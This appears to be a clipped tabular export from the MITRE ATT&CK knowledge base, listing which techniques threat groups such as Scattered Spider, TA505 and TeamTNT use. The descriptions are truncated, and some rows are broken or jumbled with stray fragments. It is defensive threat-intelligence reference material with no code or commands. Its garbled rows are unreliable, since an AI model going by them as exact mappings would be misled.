G0034 Sandwormintrusion- group uses T1059.005Visual Basiattack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1588.006Vulnerabiliattack-pat technique In 2017, [
G0034 Sandwormintrusion- group uses T1595.002Vulnerabiliattack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1071.001Web Protocattack-pat technique [Sandworm T
G0034 Sandwormintrusion- group uses T1505.003Web Shell attack-pat technique [Sandworm
G0034 Sandwormintrusion- group uses T1047 Windows M attack-pat technique [Sandworm
G0029 Scarlet Mi intrusion- group uses T1036.002Right-to-Leattack-pat technique [Scarlet Mi
G1015 Scattered Sintrusion- group uses T1098.003Additional attack-pat technique [Scattered Spider](https://att
G1015 Scattered Sintrusion- group uses T1217 Browser Inattack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1580 Cloud Infraattack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1538 Cloud Servattack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1021.007Cloud Servattack-pat technique Scattered Spider has also leve
G1015 Scattered Sintrusion- group uses T1213.003Code Reposattack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1553.002Code Signi attack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1556.009Conditionalattack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1136 Create Accattack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1578.002Create Clo attack-pat technique [Scattered Spider](https://att
G1015 Scattered Sintrusion- group uses T1552.001Credentialsattack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1486 Data Encryattack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1074 Data Stageattack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1530 Data from attack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1006 Direct Vol attack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1087.002Domain Acattack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1114 Email Colleattack-pat technique Scattered S
G1015 Scattered Sintrusion- group uses T1564.008Email Hidinattack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1567.002Exfiltratio attack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1068 Exploitatioattack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1133 External R attack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1083 File and Di attack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1657 Financial Tattack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1656 Impersonatattack-pat technique [Scattered Spider](https://att
G1015 Scattered Sintrusion- group uses T1213.005Messaging attack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1556.006Multi-Fact attack-pat technique After compr
G1015 Scattered Sintrusion- group uses T1621 Multi-Fact attack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1003.003NTDS attack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1598 Phishing foattack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1552.004Private Keyattack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1219 Remote Accattack-pat technique In addition to directing victim
G1015 Scattered Sintrusion- group uses T1018 Remote Sysattack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1598.004Spearphishattack-pat technique [Scattered Spider](https://att
G1015 Scattered Sintrusion- group uses T1539 Steal Web attack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1484.002Trust Modifattack-pat technique [Scattered
G1015 Scattered Sintrusion- group uses T1204 User Execuattack-pat technique [Scattered
G1008 SideCopy intrusion- group uses T1574.002DLL Side-L attack-pat technique [SideCopy](
G1008 SideCopy intrusion- group uses T1584.001Domains attack-pat technique [SideCopy]
G1008 SideCopy intrusion- group uses T1105 Ingress Tooattack-pat technique [SideCopy](
G1008 SideCopy intrusion- group uses T1204.002Malicious Fattack-pat technique [SideCopy](
G1008 SideCopy intrusion- group uses T1036.005Match Legiattack-pat technique [SideCopy](
G1008 SideCopy intrusion- group uses T1218.005Mshta attack-pat technique [SideCopy](
G1008 SideCopy intrusion- group uses T1106 Native API attack-pat technique [SideCopy
G1008 SideCopy intrusion- group uses T1518.001Security S attack-pat technique [SideCopy](
G1008 SideCopy intrusion- group uses T1518 Software Dattack-pat technique [SideCopy]
G1008 SideCopy intrusion- group uses T1566.001Spearphishattack-pat technique [SideCopy](
G1008 SideCopy intrusion- group uses T1598.002Spearphishattack-pat technique [SideCopy](
G1008 SideCopy intrusion- group uses T1082 System Inf attack-pat technique [SideCopy]
G1008 SideCopy intrusion- group uses T1614 System Locattack-pat technique [SideCopy]
G1008 SideCopy intrusion- group uses T1016 System Netattack-pat technique [SideCopy]
G1008 SideCopy intrusion- group uses T1608.001Upload Maattack-pat technique [SideCopy]
G1008 SideCopy intrusion- group uses T1059.005Visual Basiattack-pat technique [SideCopy](
G0121 Sidewinderintrusion- group uses T1119 Automatedattack-pat technique [Sidewinder
G0121 Sidewinderintrusion- group uses T1020 Automatedattack-pat technique [Sidewinder
G0121 Sidewinderintrusion- group uses T1027.010Command aOttack-pat technique [Sidewinder
G0121 Sidewinderintrusion- group uses T1574.002DLL Side-L attack-pat technique [Sidewinder
G0121 Sidewinderintrusion- group uses T1559.002Dynamic Daattack-pat technique [Sidewinder
G0121 Sidewinderintrusion- group uses T1027.013Encrypted/attack-pat technique [Sidewinde
G0121 Sidewinderintrusion- group uses T1203 Exploitatioattack-pat technique [Sidewinde
G0121 Sidewinderintrusion- group uses T1083 File and Di attack-pat technique [Sidewinder
G0121 Sidewinderintrusion- group uses T1105 Ingress Tooattack-pat technique [Sidewinder
G0121 Sidewinderintrusion- group uses T1059.007JavaScript attack-pat technique [Sidewinde
G0121 Sidewinderintrusion- group uses T1074.001Local Data attack-pat technique [Sidewinder
G0121 Sidewinderintrusion- group uses T1204.002Malicious Fattack-pat technique [Sidewinder
G0121 Sidewinderintrusion- group uses T1204.001Malicious Lattack-pat technique [Sidewinder
G0121 Sidewinderintrusion- group uses T1036.005Match Legiattack-pat technique [Sidewinde
G0121 Sidewinderintrusion- group uses T1218.005Mshta attack-pat technique [Sidewinde
G0121 Sidewinderintrusion- group uses T1059.001PowerShellattack-pat technique [Sidewinde
G0121 Sidewinderintrusion- group uses T1057 Process Di attack-pat technique [Sidewinder
G0121 Sidewinderintrusion- group uses T1547.001Registry Ruattack-pat technique [Sidewinder
G0121 Sidewinderintrusion- group uses T1518.001Security S attack-pat technique [Sidewinde
G0121 Sidewinderintrusion- group uses T1518 Software Dattack-pat technique [Sidewinder
G0121 Sidewinderintrusion- group uses T1566.001Spearphishattack-pat technique [Sidewinder
G0121 Sidewinderintrusion- group uses T1598.002Spearphishattack-pat technique [Sidewinder
G0121 Sidewinderintrusion- group uses T1566.002Spearphishattack-pat technique [Sidewinder
G0121 Sidewinderintrusion- group uses T1598.003Spearphishattack-pat technique [Sidewinder
G0121 Sidewinderintrusion- group uses T1082 System Inf attack-pat technique [Sidewinder
G0121 Sidewinderintrusion- group uses T1016 System Netattack-pat technique [Sidewinder
G0121 Sidewinderintrusion- group uses T1033 System Own attack-pat technique [Sidewinder
G0121 Sidewinderintrusion- group uses T1124 System Timattack-pat technique [Sidewinder
G0121 Sidewinderintrusion- group uses T1059.005Visual Basiattack-pat technique [Sidewinde
G0121 Sidewinderintrusion- group uses T1071.001Web Protocattack-pat technique [Sidewinde
G0091 Silence intrusion- group uses T1553.002Code Signi attack-pat technique [Silence](h
G0091 Silence intrusion- group uses T1027.010Command aOttack-pat technique [Silence](h
G0091 Silence intrusion- group uses T1218.001Compiled Hattack-pat technique [Silence](h
G0091 Silence intrusion- group uses T1090.002External Prattack-pat technique [Silence](h
G0091 Silence intrusion- group uses T1070.004File Deleti attack-pat technique [Silence](h
G0091 Silence intrusion- group uses T1105 Ingress Tooattack-pat technique [Silence](h
G0091 Silence intrusion- group uses T1059.007JavaScript attack-pat technique [Silence](h
G0091 Silence intrusion- group uses T1003.001LSASS Memattack-pat technique [Silence](h
G0091 Silence intrusion- group uses T1204.002Malicious Fattack-pat technique [Silence](h
G0091 Silence intrusion- group uses T1036.005Match Legiattack-pat technique [Silence](
G0091 Silence intrusion- group uses T1112 Modify Regattack-pat technique [Silence](h
G0091 Silence intrusion- group uses T1106 Native API attack-pat technique [Silence](h
G0091 Silence intrusion- group uses T1571 Non-Standaattack-pat technique [Silence](h
G0091 Silence intrusion- group uses T1059.001PowerShellattack-pat technique [Silence](h
G0091 Silence intrusion- group uses T1055 Process Injattack-pat technique [Silence](h
G0091 Silence intrusion- group uses T1547.001Registry Ruattack-pat technique [Silence](
G0091 Silence intrusion- group uses T1021.001Remote Des attack-pat technique [Silence](h
G0091 Silence intrusion- group uses T1018 Remote Sysattack-pat technique [Silence](h
G0091 Silence intrusion- group uses T1053.005Scheduled attack-pat technique [Silence](h
G0091 Silence intrusion- group uses T1113 Screen Capattack-pat technique [Silence](h
G0091 Silence intrusion- group uses T1569.002Service Ex attack-pat technique [Silence](h
G0091 Silence intrusion- group uses T1072 Software Dattack-pat technique [Silence](h
G0091 Silence intrusion- group uses T1566.001Spearphishattack-pat technique [Silence](h
G0091 Silence intrusion- group uses T1588.002Tool attack-pat technique [Silence](h
G0091 Silence intrusion- group uses T1078 Valid Acco attack-pat technique [Silence](h
G0091 Silence intrusion- group uses T1125 Video Captattack-pat technique [Silence](h
G0091 Silence intrusion- group uses T1059.005Visual Basiattack-pat technique [Silence](h
G0091 Silence intrusion- group uses T1059.003Windows Cattack-pat technique [Silence](h
G0122 Silent Libraintrusion- group uses T1588.004Digital Certattack-pat technique [Silent Lib
G0122 Silent Libraintrusion- group uses T1583.001Domains attack-pat technique [Silent Lib
G0122 Silent Libraintrusion- group uses T1585.002Email Accoattack-pat technique [Silent Lib
G0122 Silent Libraintrusion- group uses T1589.002Email Addrattack-pat technique [Silent Lib
G0122 Silent Libraintrusion- group uses T1114 Email Colleattack-pat technique [Silent Lib
G0122 Silent Libraintrusion- group uses T1114.003Email Forwattack-pat technique [Silent Lib
G0122 Silent Libraintrusion- group uses T1589.003Employee attack-pat technique [Silent Lib
G0122 Silent Libraintrusion- group uses T1608.005Link Targetattack-pat technique [Silent Lib
G0122 Silent Libraintrusion- group uses T1110.003Password Sattack-pat technique [Silent Lib
G0122 Silent Libraintrusion- group uses T1594 Search Vic attack-pat technique [Silent Lib
G0122 Silent Libraintrusion- group uses T1598.003Spearphishattack-pat technique [Silent Lib
G0122 Silent Libraintrusion- group uses T1588.002Tool attack-pat technique [Silent Lib
G0122 Silent Libraintrusion- group uses T1078 Valid Acco attack-pat technique [Silent Lib
G0083 SilverTerri intrusion- group uses T1071.002File Transf attack-pat technique [SilverTerr
G0083 SilverTerri intrusion- group uses T1657 Financial Tattack-pat technique [SilverTerr
G0083 SilverTerri intrusion- group uses T1071.003Mail Protocattack-pat technique [SilverTerr
G0083 SilverTerri intrusion- group uses T1071.001Web Protocattack-pat technique [SilverTerr
G0054 Sowbug intrusion- group uses T1560.001Archive viaattack-pat technique [Sowbug](h
G0054 Sowbug intrusion- group uses T1039 Data from attack-pat technique [Sowbug](h
G0054 Sowbug intrusion- group uses T1083 File and Di attack-pat technique [Sowbug](ht
G0054 Sowbug intrusion- group uses T1056.001Keyloggingattack-pat technique [Sowbug](h
G0054 Sowbug intrusion- group uses T1036.005Match Legiattack-pat technique [Sowbug](h
G0054 Sowbug intrusion- group uses T1135 Network Shattack-pat technique [Sowbug](h
G0054 Sowbug intrusion- group uses T1003 OS Credentattack-pat technique [Sowbug](h
G0054 Sowbug intrusion- group uses T1082 System Inf attack-pat technique [Sowbug](h
G0054 Sowbug intrusion- group uses T1059.003Windows Cattack-pat technique [Sowbug](h
G1033 Star Blizza intrusion- group uses T1583 Acquire Infattack-pat technique [Star Blizz
G1033 Star Blizza intrusion- group uses T1583.001Domains attack-pat technique [Star Blizzof the original victim
contacts
G1033 Star Blizza intrusion- group uses T1586.002Email Accoattack-pat technique
G1033 Star Blizza intrusion- group uses T1585.002Email Accoattack-pat technique [Star Blizz
G1033 Star Blizza intrusion- group uses T1114.003Email Forwattack-pat technique [Star Blizz
G1033 Star Blizza intrusion- group uses T1589 Gather Victattack-pat technique [Star Blizz
G1033 Star Blizza intrusion- group uses T1059.007JavaScript attack-pat technique [Star Blizz
G1033 Star Blizza intrusion- group uses T1204.002Malicious Fattack-pat technique [Star Blizz
G1033 Star Blizza intrusion- group uses T1114.002Remote Ema attack-pat technique [Star Blizz
G1033 Star Blizza intrusion- group uses T1593 Search Op attack-pat technique [Star Blizzard](https://attack.
G1033 Star Blizza intrusion- group uses T1585.001Social Medattack-pat technique [Star Blizz
G1033 Star Blizza intrusion- group uses T1566.001Spearphishattack-pat technique [Star
[Star Blizz
Blizzard](https://attack.
G1033 Star Blizza intrusion- group uses T1598.002Spearphishattack-pat technique [Star Blizzard](https://attack.
G1033 Star Blizza intrusion- group uses T1598.003Spearphishattack-pat technique [Star Blizzard](https://attack.
G1033 Star Blizza intrusion- group uses T1539 Steal Web attack-pat technique phishing domains.(Citation: C
G1033 Star Blizza intrusion- group uses T1588.002Tool attack-pat technique [Star Blizz
G1033 Star Blizza intrusion- group uses T1608.001Upload Maattack-pat technique [Star Blizz
G1033 Star Blizza intrusion- group uses T1078 Valid Acco attack-pat technique [Star Blizz
G1033 Star Blizza intrusion- group uses T1550.004Web Sessioattack-pat technique [Star Blizz
G0038 Stealth Fal intrusion- group uses T1059 Command attack-pat
an technique [Stealth Fa
G0038 Stealth Fal intrusion- group uses T1555 Credential attack-pat technique [Stealth Fa
G0038 Stealth Fal intrusion- group uses T1555.003Credential attack-pat technique [Stealth Fa
G0038 Stealth Fal intrusion- group uses T1005 Data from attack-pat technique [Stealth Fa
G0038 Stealth Fal intrusion- group uses T1041 Exfiltratio attack-pat technique After data
G0038 Stealth Fal intrusion- group uses T1059.001PowerShellattack-pat technique [Stealth F
G0038 Stealth Fal intrusion- group uses T1057 Process Di attack-pat technique [Stealth Fa
G0038 Stealth Fal intrusion- group uses T1012 Query Regiattack-pat technique [Stealth Fa
G0038 Stealth Fal intrusion- group uses T1053.005Scheduled attack-pat technique [Stealth Fa
G0038 Stealth Fal intrusion- group uses T1573.001Symmetric attack-pat technique [Stealth Fa
G0038 Stealth Fal intrusion- group uses T1082 System Inf attack-pat technique [Stealth Fa
G0038 Stealth Fal intrusion- group uses T1016 System Netattack-pat technique [Stealth Fa
G0038 Stealth Fal intrusion- group uses T1033 System Own attack-pat technique [Stealth Fa
G0038 Stealth Fal intrusion- group uses T1071.001Web Protocattack-pat technique [Stealth Fa
G0038 Stealth Fal intrusion- group uses T1555.004Windows Cattack-pat technique [Stealth Fa
G0038 Stealth Fal intrusion- group uses T1047 Windows M attack-pat technique [Stealth F
G0041 Strider intrusion- group uses T1564.005Hidden Fil attack-pat technique [Strider](h
G0041 Strider intrusion- group uses T1090.001Internal Prattack-pat technique [Strider](h
G0041 Strider intrusion- group uses T1556.002Password Fiattack-pat technique [Strider](h
G0039 Suckfly intrusion- group uses T1553.002Code Signi attack-pat technique [Suckfly](h
G0039 Suckfly intrusion- group uses T1046 Network Seattack-pat technique [Suckfly](h
G0039 Suckfly intrusion- group uses T1003 OS Credentattack-pat technique [Suckfly](h
G0039 Suckfly intrusion- group uses T1078 Valid Acco attack-pat technique [Suckfly](h
G0039 Suckfly intrusion- group uses T1059.003Windows Cattack-pat technique Several to
G1018 TA2541 intrusion- group uses T1573.002Asymmetricattack-pat technique [TA2541](h
G1018 TA2541 intrusion- group uses T1562.001Disable or attack-pat technique [TA2541](ht
G1018 TA2541 intrusion- group uses T1583.001Domains attack-pat technique [TA2541](h
G1018 TA2541 intrusion- group uses T1568 Dynamic Reattack-pat technique [TA2541](h
[TA2541](https://attack.mitre
G1018 TA2541 intrusion- group uses T1027.013Encrypted/attack-pat technique [TA2541](https://attack.mitre
G1018 TA2541 intrusion- group uses T1105 Ingress Tooattack-pat technique [TA2541](https://attack.mitre
G1018 TA2541 intrusion- group uses T1016.001Internet C attack-pat technique [TA2541](https://attack.mitre
G1018 TA2541 intrusion- group uses T1204.002Malicious Fattack-pat technique
G1018 TA2541 intrusion- group uses T1204.001Malicious Lattack-pat technique [TA2541](h
G1018 TA2541 intrusion- group uses T1588.001Malware attack-pat technique [TA2541](ht
G1018 TA2541 intrusion- group uses T1036.005Match Legiattack-pat technique [TA2541](ht
[TA2541](https://attack.mitre
G1018 TA2541 intrusion- group uses T1218.005Mshta attack-pat technique
G1018 TA2541 intrusion- group uses T1059.001PowerShellattack-pat technique [TA2541](h
G1018 TA2541 intrusion- group uses T1055.012Process Hoattack-pat technique [TA2541](h
G1018 TA2541 intrusion- group uses T1055 Process Injattack-pat technique [TA2541](ht
G1018 TA2541 intrusion- group uses T1547.001Registry Ruattack-pat technique [TA2541](ht
G1018 TA2541 intrusion- group uses T1053.005Scheduled attack-pat technique [TA2541](ht
G1018 TA2541 intrusion- group uses T1518.001Security S attack-pat technique [TA2541](ht
G1018 TA2541 intrusion- group uses T1027.002Software Pattack-pat technique [TA2541](ht
G1018 TA2541 intrusion- group uses T1566.001Spearphishattack-pat technique [TA2541](h
[TA2541](https://attack.mitre
G1018 TA2541 intrusion- group uses T1566.002Spearphishattack-pat technique
G1018 TA2541 intrusion- group uses T1082 System Inf attack-pat technique [TA2541](h
[TA2541](https://attack.mitre
G1018 TA2541 intrusion- group uses T1588.002Tool attack-pat technique
G1018 TA2541 intrusion- group uses T1608.001Upload Maattack-pat technique [TA2541](h
G1018 TA2541 intrusion- group uses T1059.005Visual Basiattack-pat technique [TA2541](ht
G1018 TA2541 intrusion- group uses T1583.006Web Servicattack-pat technique [TA2541](ht
G1018 TA2541 intrusion- group uses T1047 Windows M attack-pat technique [TA2541](h
G0062 TA459 intrusion- group uses T1203 Exploitatioattack-pat technique [TA459](htt
G0062 TA459 intrusion- group uses T1204.002Malicious Fattack-pat technique [TA459](htt
G0062 TA459 intrusion- group uses T1059.001PowerShellattack-pat technique [TA459](htt
G0062 TA459 intrusion- group uses T1566.001Spearphishattack-pat technique [TA459](htt
G0062 TA459 intrusion- group uses T1059.005Visual Basiattack-pat technique [TA459](htt
G0092 TA505 intrusion- group uses T1553.002Code Signi attack-pat technique [TA505](htt
G0092 TA505 intrusion- group uses T1027.010Command aOttack-pat technique [TA505](ht
G0092 TA505 intrusion- group uses T1552.001Credentialsattack-pat technique [TA505](htt
G0092 TA505 intrusion- group uses T1555.003Credential attack-pat technique [TA505](htt
G0092 TA505 intrusion- group uses T1486 Data Encryattack-pat technique [TA505](htt
G0092 TA505 intrusion- group uses T1140 Deobfuscatattack-pat technique [TA505](ht
G0092 TA505 intrusion- group uses T1562.001Disable or attack-pat technique [TA505](ht
G0092 TA505 intrusion- group uses T1078.002Domain Acattack-pat technique [TA505](ht
G0092 TA505 intrusion- group uses T1583.001Domains attack-pat technique [TA505](ht
G0092 TA505 intrusion- group uses T1559.002Dynamic Daattack-pat technique [TA505](ht
G0092 TA505 intrusion- group uses T1055.001Dynamic-linattack-pat technique [TA505](htt
G0092 TA505 intrusion- group uses T1087.003Email Accoattack-pat technique [TA505](htt
G0092 TA505 intrusion- group uses T1027.013Encrypted/attack-pat technique [TA505](ht
G0092 TA505 intrusion- group uses T1568.001Fast Flux attack-pat technique [TA505](htt
G0092 TA505 intrusion- group uses T1105 Ingress Tooattack-pat technique [TA505](ht
G0092 TA505 intrusion- group uses T1059.007JavaScript attack-pat technique [TA505](htt
G0092 TA505 intrusion- group uses T1204.002Malicious Fattack-pat technique [TA505](htt
G0092 TA505 intrusion- group uses T1204.001Malicious Lattack-pat technique [TA505](htt
G0092 TA505 intrusion- group uses T1588.001Malware attack-pat technique [TA505](htt
G0092 TA505 intrusion- group uses T1553.005Mark-of-thattack-pat technique [TA505](htt
G0092 TA505 intrusion- group uses T1112 Modify Regattack-pat technique [TA505](ht
G0092 TA505 intrusion- group uses T1218.007Msiexec attack-pat technique [TA505](ht
G0092 TA505 intrusion- group uses T1106 Native API attack-pat technique [TA505](ht
G0092 TA505 intrusion- group uses T1069 Permissionattack-pat technique [TA505](ht
G0092 TA505 intrusion- group uses T1059.001PowerShellattack-pat technique [TA505](ht
G0092 TA505 intrusion- group uses T1218.011Rundll32 attack-pat technique [TA505](ht
G0092 TA505 intrusion- group uses T1027.002Software Pattack-pat technique [TA505](ht
G0092 TA505 intrusion- group uses T1566.001Spearphishattack-pat technique [TA505](htt
G0092 TA505 intrusion- group uses T1566.002Spearphishattack-pat technique [TA505](htt
G0092 TA505 intrusion- group uses T1588.002Tool attack-pat technique [TA505](htt
G0092 TA505 intrusion- group uses T1608.001Upload Maattack-pat technique [TA505](ht
G0092 TA505 intrusion- group uses T1059.005Visual Basiattack-pat technique [TA505](ht
G0092 TA505 intrusion- group uses T1071.001Web Protocattack-pat technique [TA505](ht
G0092 TA505 intrusion- group uses T1059.003Windows Cattack-pat technique [TA505](ht
G0127 TA551 intrusion- group uses T1027.010Command aOttack-pat technique [TA551](htt
G0127 TA551 intrusion- group uses T1568.002Domain Gen attack-pat technique [TA551](ht
G0127 TA551 intrusion- group uses T1589.002Email Addrattack-pat technique [TA551](htt
G0127 TA551 intrusion- group uses T1105 Ingress Tooattack-pat technique [TA551](htt
G0127 TA551 intrusion- group uses T1204.002Malicious Fattack-pat technique [TA551](ht
G0127 TA551 intrusion- group uses T1036 Masqueradattack-pat technique [TA551](htt
G0127 TA551 intrusion- group uses T1218.005Mshta attack-pat technique [TA551](ht
G0127 TA551 intrusion- group uses T1218.010Regsvr32 attack-pat technique [TA551](htt
G0127 TA551 intrusion- group uses T1218.011Rundll32 attack-pat technique [TA551](htt
G0127 TA551 intrusion- group uses T1566.001Spearphishattack-pat technique [TA551](htt
G0127 TA551 intrusion- group uses T1132.001Standard Eattack-pat technique [TA551](htt
G0127 TA551 intrusion- group uses T1027.003Steganogr attack-pat technique [TA551](ht
G0127 TA551 intrusion- group uses T1071.001Web Protocattack-pat technique [TA551](htt
G0127 TA551 intrusion- group uses T1059.003Windows Cattack-pat technique [TA551](ht
G1037 TA577 intrusion- group uses T1586.002Email Accoattack-pat technique [TA577](ht
G1037 TA577 intrusion- group uses T1027.009Embeddedattack-pat technique [TA577](ht
G1037 TA577 intrusion- group uses T1059.007JavaScript attack-pat technique [TA577](htt
G1037 TA577 intrusion- group uses T1204.001Malicious Lattack-pat technique [TA577](htt
G1037 TA577 intrusion- group uses T1566.002Spearphishattack-pat technique [TA577](htt
G1037 TA577 intrusion- group uses T1059.003Windows Cattack-pat technique [TA577](htt
G1038 TA578 intrusion- group uses T1059.007JavaScript attack-pat technique [TA578](htt
G1038 TA578 intrusion- group uses T1204.001Malicious Lattack-pat technique [TA578](htt
G1038 TA578 intrusion- group uses T1594 Search Vic attack-pat technique [TA578](htt
G1038 TA578 intrusion- group uses T1583.006Web Servicattack-pat technique [TA578](htt
G0139 TeamTNT intrusion- group uses T1071 Applicationattack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1070.003Clear Comm attack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1070.002Clear Linu attack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1059.009Cloud API attack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1552.005Cloud Inst attack-pat technique [TeamTNT](h
G0139 TeamTNT intrusion- group uses T1496.001Compute Hiattack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1609 Container attack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1613 Container attack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1552.001Credentialsattack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1140 Deobfuscatattack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1610 Deploy Conattack-pat technique [TeamTNT](h
G0139 TeamTNT intrusion- group uses T1562.004Disable or attack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1562.001Disable or attack-pat technique [TeamTNT](h
G0139 TeamTNT intrusion- group uses T1583.001Domains attack-pat technique [TeamTNT](h
G0139 TeamTNT intrusion- group uses T1027.013Encrypted/attack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1611 Escape to attack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1048 Exfiltratio attack-pat technique [TeamTNT](h
G0139 TeamTNT intrusion- group uses T1133 External R attack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1070.004File Deleti attack-pat technique [TeamTNT](h
G0139 TeamTNT intrusion- group uses T1083 File and Di attack-pat technique [TeamTNT](h
G0139 TeamTNT intrusion- group uses T1105 Ingress Tooattack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1222.002Linux and M attack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1136.001Local Acco attack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1074.001Local Data attack-pat technique [TeamTNT](h
G0139 TeamTNT intrusion- group uses T1204.003Malicious attack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1587.001Malware attack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1036 Masqueradattack-pat technique [TeamTNT](h
G0139 TeamTNT intrusion- group uses T1036.005Match Legiattack-pat technique [TeamTNT](h
G0139 TeamTNT intrusion- group uses T1046 Network Seattack-pat technique [TeamTNT](h
G0139 TeamTNT intrusion- group uses T1120 Peripheral attack-pat technique [TeamTNT](h
G0139 TeamTNT intrusion- group uses T1059.001PowerShellattack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1552.004Private Keyattack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1057 Process Di attack-pat technique [TeamTNT](h
G0139 TeamTNT intrusion- group uses T1547.001Registry Ruattack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1219 Remote Accattack-pat technique [TeamTNT](h
G0139 TeamTNT intrusion- group uses T1014 Rootkit attack-pat technique [TeamTNT](h
G0139 TeamTNT intrusion- group uses T1021.004SSH attack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1098.004SSH Authorattack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1595.001Scanning IPattack-pat technique [TeamTNT](h
G0139 TeamTNT intrusion- group uses T1518.001Security S attack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1027.002Software Pattack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1082 System Inf attack-pat technique [TeamTNT](h
G0139 TeamTNT intrusion- group uses T1016 System Netattack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1049 System Netattack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1007 System Serattack-pat technique [TeamTNT](h
G0139 TeamTNT intrusion- group uses T1569 System Serattack-pat technique [TeamTNT](h
G0139 TeamTNT intrusion- group uses T1543.002Systemd Seattack-pat technique [TeamTNT](h
G0139 TeamTNT intrusion- group uses T1059.004Unix Shell attack-pat technique [TeamTNT](h
G0139 TeamTNT intrusion- group uses T1608.001Upload Maattack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1595.002Vulnerabiliattack-pat technique [TeamTNT](h
G0139 TeamTNT intrusion- group uses T1071.001Web Protocattack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1102 Web Servicattack-pat technique [TeamTNT](h
G0139 TeamTNT intrusion- group uses T1059.003Windows Cattack-pat technique [TeamTNT](
G0139 TeamTNT intrusion- group uses T1543.003Windows Se attack-pat technique [TeamTNT](
G0089 The White intrusion- group uses T1203 Exploitatioattack-pat technique [The Whit
G0089 The White intrusion- group uses T1070.004File Deleti attack-pat technique [The White
G0089 The White intrusion- group uses T1204.002Malicious Fattack-pat technique [The White
G0089 The White intrusion- group uses T1518.001Security S attack-pat technique [The White
G0089 The White intrusion- group uses T1027.002Software Pattack-pat technique [The White
G0089 The White intrusion- group uses T1566.001Spearphishattack-pat technique [The White
G0089 The White intrusion- group uses T1124 System Timattack-pat technique [The White
G0028 Threat Grointrusion- group uses T1078.002Domain Acattack-pat technique [Threat Gro
G0028 Threat Grointrusion- group uses T1021.002SMB/Windo attack-pat technique [Threat Gr
G0028 Threat Grointrusion- group uses T1072 Software Dattack-pat technique [Threat Gro
G0028 Threat Grointrusion- group uses T1059.003Windows Cattack-pat technique [Threat Gr
G0027 Threat Grointrusion- group uses T1560.002Archive viaattack-pat technique [Threat Gr
G0027 Threat Grointrusion- group uses T1053.002At attack-pat technique [Threat Gro
G0027 Threat Grointrusion- group uses T1119 Automatedattack-pat technique [Threat Gro
G0027 Threat Grointrusion- group uses T1548.002Bypass Useattack-pat technique A [Threat
G0027 Threat Grointrusion- group uses T1588.003Code Signinattack-pat technique [Threat Gro
G0027 Threat Grointrusion- group uses T1195.002Compromise attack-pat technique [Threat Gro
G0027 Threat Grointrusion- group uses T1574.001DLL Searchattack-pat technique [Threat Gr
G0027 Threat Grointrusion- group uses T1574.002DLL Side-L attack-pat technique [Threat Gro
